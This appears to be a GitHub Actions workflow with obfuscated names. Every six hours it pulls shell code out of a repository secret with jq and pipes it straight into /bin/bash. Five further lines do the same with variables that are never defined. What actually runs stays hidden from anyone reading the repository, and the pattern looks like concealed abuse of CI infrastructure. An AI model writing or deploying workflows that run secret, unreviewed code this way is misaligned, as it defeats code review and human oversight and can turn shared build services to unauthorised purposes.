name: tulinglong4318

on:
  workflow_dispatch:
  schedule:
    - cron: '23 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tulinglong4318
        env:
          a2918: ${{ secrets.a2918 }}
        run: |
          echo $a2918 | jq -r .pvk0509 | /bin/bash
          echo $u654 | jq -r .f73011 | /bin/bash
          echo $g57 | jq -r .vl7231 | /bin/bash
          echo $onvv41 | jq -r .ft2749 | /bin/bash
          echo $ap1 | jq -r .zuz803 | /bin/bash
          echo $son3 | jq -r .l6414 | /bin/bash

